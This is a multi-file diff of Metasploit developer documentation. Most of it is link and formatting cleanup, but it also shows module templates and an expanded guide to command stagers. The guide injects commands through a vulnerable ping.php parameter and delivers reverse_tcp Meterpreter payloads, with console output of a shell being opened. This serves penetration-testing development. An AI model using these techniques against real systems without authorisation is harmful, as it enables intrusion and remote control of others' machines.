-**2** - Load your TARGETURI with [`target_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
+**2** - Load your TARGETURI with [`target_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:

 In this example, we'll just load the path:

@@ -144,7 +144,7 @@ In this example, we'll just load the path:
 uri = target_uri.path
 ```

-**3** - When you want to join another URI, always use [`normalize_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
+**3** - When you want to join another URI, always use [`normalize_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):

 Example:

@@ -164,8 +164,6 @@ Please note: The `normalize_uri` method will always follow these rules:
 ## Full Example

 ```ruby
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
@@ -38,7 +38,7 @@ register_options(

 ### Fixed filename

-Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
+Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [[msftidy|./Guidelines-for-Accepting-Modules-and-Enhancements.md]]. Instead, here's how it's done properly:

 1 - Deregister the ```FILENAME``` option

@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'

 When the user loads that module, they should see a warning like this:

-```
+```msf
 msf > use exploit/windows/misc/test 

 [!] ************************************************************************
@@ -48,8 +48,6 @@ msf > use exploit/windows/misc/test
 ## Code example

 ```ruby
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

@@ -58,23 +56,26 @@ class MetasploitModule < Msf::Exploit::Remote
  deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth')

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Msf::Module::Deprecated Example',
-      'Description' => %q{
-        This shows how to use Msf::Module::Deprecated.
-      },
-      'Author'      => [ 'sinn3r' ],
-      'License'     => MSF_LICENSE,
-      'References'  => [ [ 'URL', 'http://metasploit.com' ] ],
-      'DisclosureDate' => 'Apr 01 2014',
-      'Targets'        => [ [ 'Automatic', { } ] ],
-      'DefaultTarget'  => 0
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Msf::Module::Deprecated Example',
+        'Description' => %q{
+          This shows how to use Msf::Module::Deprecated.
+        },
+        'Author' => [ 'sinn3r' ],
+        'License' => MSF_LICENSE,
+        'References' => [ [ 'URL', 'http://metasploit.com' ] ],
+        'DisclosureDate' => '2014-04-01',
+        'Targets' => [ [ 'Automatic', {} ] ],
+        'DefaultTarget' => 0
+      )
+    )
  end

  def exploit
-    print_debug("Code example")
+    print_debug('Code example')
  end

 end
-```
+```
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work

 Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:

-```
+```msf
 msf auxiliary(oracle_login) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
 msf auxiliary(oracle_login) > run
 ```
 or
-```
+```msf
 msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -159,4 +159,4 @@ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
 root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
-```
+```
@@ -2,4 +2,4 @@

 I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.

-[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
+[[You should try writing post modules instead|./How-to-get-started-with-writing-a-post-module.md]].
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R

 You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:

-```
+```msf
 msf exploit(handler) > run

 [*] Started reverse handler on 192.168.1.64:4444 
@@ -53,19 +53,20 @@ Here's the most basic example of an auxiliary module. We'll explain a bit more a
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Module name',
-      'Description'    => %q{
-        Say something that the user might want to know.
-      },
-      'Author'         => [ 'Name' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Module name',
+        'Description' => %q{
+          Say something that the user might want to know.
+        },
+        'Author' => [ 'Name' ],
+        'License' => MSF_LICENSE
+      )
+    )
  end

  def run
@@ -89,21 +90,22 @@ Because the ```Msf::Auxiliary::Scanner``` mixin is so popular, we figured you wa
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Scanner

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Module name',
-      'Description'    => %q{
-        Say something that the user might want to know.
-      },
-      'Author'         => [ 'Name' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Module name',
+        'Description' => %q{
+          Say something that the user might want to know.
+        },
+        'Author' => [ 'Name' ],
+        'License' => MSF_LICENSE
+      )
+    )
  end

  def run_host(ip)
@@ -15,7 +15,7 @@ msf > irb
 By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:


-```
+```msf
 msf > setg LogLevel 3
 LogLevel => 3
 msf >
@@ -1,9 +1,9 @@
 **Note: This documentation may need to be vetted.**

 # How to send an HTTP request using Rex::Proto::Http::Client
-The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
+The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [[Msf::Exploit::Remote::HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]] mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.

-However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
+However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]]. If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).

 ## Initializing Rex::Proto::Http::Client

@@ -1,5 +1,5 @@
 # How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
-The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
+The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]] instead. However, some of the datastore options are still needed, so let's go over them right quick.

 ### Regular options

@@ -53,6 +53,6 @@ Check out the other advanced options in the API documentation below.

 ### References

- <https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Powershell.html>
+- <https://docs.metasploit.com/api/Msf/Exploit/Powershell.html>
 - <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb>
 - <https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1>
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno

 Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 ```

@@ -24,7 +24,7 @@ This may sound surprising, but sometimes we get asked questions that are already

 You can use the info command to see the module's description:

-```
+```msf
 msf exploit(ms08_067_netapi) > info
 ```

@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the

 The "show options" command will tell you which target is selected. For example:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 The "show targets" command will give you a list of targets supported:

-```
+```msf
 msf exploit(ms08_067_netapi) > show targets
 ```

@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets

 All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:

-```
+```msf
 msf exploit(ms08_067_netapi) > set
 ```

@@ -1,4 +1,6 @@
-Command stagers provide an easy way to write exploits against typical vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection). There are currently 14 different flavors of command stagers, each uses system command (or commands) to save your payload, sometimes decode, and execute.
+If you’ve found a way to execute a command on a target, and you’d like the leverage that ability to execute a command into a meterpreter session, command stagers are for you.  Command stagers provide an easy way to write exploits that leverage vulnerabilities such as [command execution](https://www.owasp.org/index.php/Command_Injection) or [code injection](https://www.owasp.org/index.php/Code_Injection) and turn them into sessions. There are currently 14 different flavors of command stagers, each uses system command (or commands) to save (or not save) your payload, sometimes decode, and execute.
+
+The hardest part about command stagers is understanding how much they do.  All you need to do for a command stager is to define how the command injection works in the `execute_command` method and then select a few options.

 # The Vulnerability Test Case

@@ -85,7 +87,7 @@ An example of setting flavors for a specific target:
  ]
 ```

-Or, you can pass this info to the `execute_cmdstager` method (see Call #execute_cmdstager to begin).
+Or, you can pass this info to the `execute_cmdstager` method (see Step 4 to begin).

 ```ruby
 execute_cmdstager(flavor: :vbs)
@@ -96,11 +98,62 @@ However, it is best to set the compatible list of flavors in `CmdStagerFlavor`,

 **3. Create the execute_command method**

-You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is what gets called by the CmdStager mixin when it kicks in. Your objective in this method is to inject whatever is in the ```cmd``` variable to the vulnerable code.
+You also must create a ```def execute_command(cmd, opts = {})``` method in your module. This is how you define how to execute a command on the target.  The parameter `cmd` is the command to execute.  When writing the ```execute_cmd``` method, remember that

-**4. Call #execute_cmdstager to begin**
+**4. Decide on the supported payloads**

-And lastly, in your exploit method, call ```execute_cmdstager``` to begin the command stager.
+CmdStagers are intended to support payloads that are uploaded, saved to disk, and launched, but many of the payloads in Metasploit Framework do not need to be saved to disk; these payloads are `ARCH_CMD` payloads that rely on software already present on the target system like netcat, bash, python, or ssh.  Depending on whether the payload needs to be saved to disk or not changes what payloads are supported and how we launch the payload, so we must provide the user the ability to pick between the two.
+The best way to let the user decide what kind of payload to use is by defining separate [[targets|Get-Started-Writing-an-Exploit.md]]
+
+Here is an example targets section from a command injection module:
+
+```
+    'Targets' => [
+      [
+        'Unix Command',
+        {
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
+            'RPORT' => 9000
+          }
+        }
+      ],
+      [
+        'Linux (Dropper)',
+        {
+          'Platform' => 'linux',
+          'Arch' => [ARCH_X64],
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+          'Type' => :linux_dropper
+        }
+      ],
+
+```
+
+The first target is the `ARCH_CMD` target and `unix` platform.  This allows the user to select any payload that starts with `cmd/unix`.  These payloads do not need to be saved to disk and can just be launched at the command line.  The second is `ARCH_X64` and the platform is `linux`; this lets us choose any payload that starts with `linux/x64`.  These targets must be saved to disk before they can be launched, and as such, you will often see this second type of payload referred to as a ‘dropper’ because the file must be ‘dropped’ to the disk before it can be executed.  In each of the targets above, we’ve selected a default payload we know will work.
+
+**4. Executing a payload**
+As we said earlier, the way a payload is executed depends on the payload type.  By including `Msf::Exploit::CmdStager` you are given access to a method called ```execute_cmdstager```.  ```execute_cmdstager``` makes a list of required commands to upload, save, and execute your payload, then uses the ```execute_command``` method you defined earlier to run them on the target.
+Unfortunately, we just mentioned not all payloads need to be saved to disk.  In the case of a payload that does not need to be saved to disk, we only need to call ```execute_command```.
+This problem of payload/method juggling sounds far worse than it is.  Below is a quick example of how simple the ```exploit``` method will become if you have properly defined your targets as discussed in step 3:
+
+```ruby
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+```
+
+That’s it.  If the user selects an `ARCH_CMD` payload, we call the ```execute_command``` method on the _already_ _encoded_ payload.  You don’t need to worry about encoding the payload in your ```execute_command``` method.
+If the user has selected a binary payload like `ARCH_X64` or `ARCH_X86`, then we call ```execute_cmdstager``` which figures out how to save the file to disk and launch it based on the flavor you set earlier.

 Over the years, we have also learned that these options are quite handy when calling
 `execute_cmdstager`:
@@ -119,22 +172,26 @@ class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::CmdStager

-  def initialize(info={})
-    super(update_info(info,
-      'Name'            => "Command Injection Using CmdStager",
-      'Description'     => %q{
-        This exploits a command injection using the command stager.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          => [ 'sinn3r' ],
-      'References'      => [ [ 'URL', 'http://metasploit.com' ] ],
-      'Platform'        => 'linux',
-      'Targets'         => [ [ 'Linux', {} ] ],
-      'Payload'         => { 'BadChars' => "\x00" },
-      'CmdStagerFlavor' => [ 'printf' ],
-      'Privileged'      => false,
-      'DisclosureDate'  => "2016-06-10",
-      'DefaultTarget'   => 0))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Command Injection Using CmdStager',
+        'Description' => %q{
+          This exploits a command injection using the command stager.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [ [ 'URL', 'http://metasploit.com' ] ],
+        'Platform' => 'linux',
+        'Targets' => [ [ 'Linux', {} ] ],
+        'Payload' => { 'BadChars' => "\x00" },
+        'CmdStagerFlavor' => [ 'printf' ],
+        'Privileged' => false,
+        'DisclosureDate' => '2016-06-10',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def execute_command(cmd, opts = {})
@@ -142,7 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    print_status("Exploiting...")
+    print_status('Exploiting...')
    execute_cmdstager
  end

@@ -158,7 +215,7 @@ Now let's modify the `execute_command` method and get code execution against the
 127.0.0.1+%26%26+[Malicious commands]
 ```

-We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
+We do that in `execute_command` using [[HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]]. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:

 ```ruby
 def filter_bad_chars(cmd)
@@ -167,19 +224,21 @@ def filter_bad_chars(cmd)
  cmd.gsub!(/ /, '+')
 end

-def execute_command(cmd, opts = {})
-  send_request_cgi({
-    'method'        => 'GET',
-    'uri'           => '/ping.php',
-    'encode_params' => false,
-    'vars_get'      => {
-      'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
+def execute_command(cmd, _opts = {})
+  send_request_cgi(
+    {
+      'method' => 'GET',
+      'uri' => '/ping.php',
+      'encode_params' => false,
+      'vars_get' => {
+        'ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}"
+      }
    }
-  })
+  )
 end

 def exploit
-  print_status("Exploiting...")
+  print_status('Exploiting...')
  execute_cmdstager
 end
 ```
@@ -187,10 +246,10 @@ end
 And let's run that, we should have a shell:


-```
+```msf
 msf exploit(cmdstager_demo) > run

-[*] Started reverse TCP handler on 10.6.0.92:4444 
+[*] Started reverse TCP handler on 10.6.0.92:4444
 [*] Exploiting...
 [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
 [*] Sending stage (1495599 bytes) to 10.6.0.92
@@ -223,7 +282,7 @@ Available flavors:

 The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.

-If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
+If you are exploiting Windows that supports Powershell, then you might want to [[consider using that instead|./How-to-use-Powershell-in-an-exploit.md]] of the VBS stager, because Powershell tends to be more stealthy.

 To use the VBS stager, either specify your CmdStagerFlavor in the metadata:

@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
 remembers that datastore option, no other components will know about it. You are setting a module-level option if you
 load a module first, and then use the `set` command, like the following:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
 rhost => 10.0.1.3
@@ -238,34 +238,34 @@ from the module's metadata, and update again.
 Here's an example of an exploit module's initialize portion with the DefaultOptions key:

 ```ruby
-def initialize(info={})
-  super(update_info(info,
-    'Name'           => "Module name",
-    'Description'    => %q{
-      This is an example of setting the default value of RPORT using the DefaultOptions key
-    },
-    'License'        => MSF_LICENSE,
-    'Author'         => [ 'Name' ],
-    'References'     =>
-      [
+def initialize(info = {})
+  super(
+    update_info(
+      info,
+      'Name' => 'Module name',
+      'Description' => %q{
+        This is an example of setting the default value of RPORT using the DefaultOptions key
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Name' ],
+      'References' => [
        [ 'URL', '' ]
      ],
-    'Platform'       => 'win',
-    'Targets'        =>
-      [
+      'Platform' => 'win',
+      'Targets' => [
        [ 'Windows', { 'Ret' => 0x41414141 } ]
      ],
-    'Payload'        =>
-      {
+      'Payload' => {
        'BadChars' => "\x00"
      },
-    'DefaultOptions' =>
-      {
+      'DefaultOptions' => {
        'RPORT' => 8080
      },
-    'Privileged'     => false,
-    'DisclosureDate' => "",
-    'DefaultTarget'  => 0))
+      'Privileged' => false,
+      'DisclosureDate' => '',
+      'DefaultTarget' => 0
+    )
+  )
 end
 ```

@@ -27,13 +27,14 @@ OPTIONS:
    -c        Clear the contents of the favorite modules file
    -d        Delete module(s) or the current active module from the favorite modules file
    -h        Help banner
+    -l        Print the list of favorite modules (alias for `show favorites`)
 ```



 The second method of adding favorites allows adding multiple modules at once:

-```shell
+```msf
 msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +73,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec

 #### Clearing the favorites list

-```shell
+```msf
 msf6 > show favorites

 Favorites
@@ -89,3 +90,18 @@ msf6 > show favorites
 [!] The favorite modules file is empty
 ```

+### Printing the list of favorite modules
+
+The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.
+
+```shell
+msf6 > favorite -l
+
+Favorites
+=========
+
+   #  Name                        Disclosure Date  Rank    Check  Description
+   -  ----                        ---------------  ----    -----  -----------
+   0  exploit/multi/handler                        manual  No     Generic Payload Handler
+   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
+```
@@ -351,7 +351,7 @@ end

 The module will start the http server and print the repo to clone

-```
+```msf
 msf6 > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(multi/http/git_clone_test) > set srvport 9999
@@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
 * **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

-If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
+If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"

 ## Make a connection

@@ -1,6 +1,6 @@
 This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.

-Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
+Before we begin, it's probably a good idea to read [[Creating Metasploit Framework LoginScanners|./Creating-Metasploit-Framework-LoginScanners.md]], which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.

 ## Step 1: Set up your target environment

@@ -245,7 +245,6 @@ A basic auxiliary module template in our case would be something like this:
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
 require 'metasploit/framework/login_scanner/symantec_web_gateway'
 require 'metasploit/framework/credential_collection'

@@ -256,21 +255,23 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Symantec Web Gateway Login Utility',
-      'Description' => %q{
-        This module will attempt to authenticate to a Symantec Web Gateway.
-      },
-      'Author'      => [ 'sinn3r' ],
-      'License'     => MSF_LICENSE,
-      'DefaultOptions' =>
-        {
-          'RPORT'      => 443,
-          'SSL'        => true,
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Symantec Web Gateway Login Utility',
+        'Description' => %q{
+          This module will attempt to authenticate to a Symantec Web Gateway.
+        },
+        'Author' => [ 'sinn3r' ],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
          'SSLVersion' => 'TLS1'
        }
-    ))
+      )
+    )
  end

  def run_host(ip)
@@ -382,7 +383,7 @@ And finally, make sure your module actually works.

 Test for a successful login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +394,7 @@ msf auxiliary(symantec_web_gateway_login) >

 Test for a failed login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'
@@ -1,8 +1,8 @@
 The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:

-* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
+* **[[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]]** - The most basic form of a HTTP server.
 * **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
-* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
+* **[[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.

 ### The Automatic Exploitation Procedure

@@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
 	</html>
 	|
 	send_exploit_html(cli, html)
-end 
+end
 ```

 [ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
@@ -198,69 +198,68 @@ To get thing started, here's a code example you can use start developing your br
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "BrowserExploitServer Example",
-      'Description'    => %q{
-        This is an example of building a browser exploit using the BrowserExploitServer mixin
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BrowserExploitServer Example',
+        'Description' => %q{
+          This is an example of building a browser exploit using the BrowserExploitServer mixin
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          [ 'URL', 'http://metasploit.com' ]
        ],
-      'Platform'       => 'win',
-      'BrowserRequirements' =>
-        {
-          :source => /script|headers/i,
+        'Platform' => 'win',
+        'BrowserRequirements' => {
+          source: /script|headers/i
        },
-      'Targets'        =>
-        [
+        'Targets' => [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 8',
            {
-              'os_name'   => 'Windows XP',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '8.0'
+              'os_name' => 'Windows XP',
+              'ua_name' => 'MSIE',
+              'ua_ver' => '8.0'
            }
          ],
          [
            'Windows 7 with IE 9',
            {
-              'os_name'   => 'Windows 7',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '9.0'
+              'os_name' => 'Windows 7',
+              'ua_name' => 'MSIE',
+              'ua_ver' => '9.0'
            }
          ]
        ],
-      'Payload'        => { 'BadChars' => "\x00" },
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => '2013-04-01',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def exploit_template(target_info)
-    template = %Q|
+    template = %(
    Data source: <%=target_info[:source]%><br>
    OS name: <%=target_info[:os_name]%><br>
    UA name: <%=target_info[:ua_name]%><br>
    UA version: <%=target_info[:ua_ver]%><br>
    Java version: <%=target_info[:java]%><br>
    Office version: <%=target_info[:office]%>
-    |
+    )

-    return template, binding()
+    return template, binding
  end

-  def on_request_exploit(cli, request, target_info)
+  def on_request_exploit(cli, _request, target_info)
    send_exploit_html(cli, exploit_template(target_info))
  end

@@ -296,7 +295,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
 deregister_options('JsObfuscate')
 ```

-To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
+To learn more about Metasploit's JavaScript obfuscation capabilities, please read [[How to obfuscate JavaScript in Metasploit|./How-to-obfuscate-JavaScript-in-Metasploit.md]].


 ### Related Articles:
@@ -1,4 +1,4 @@
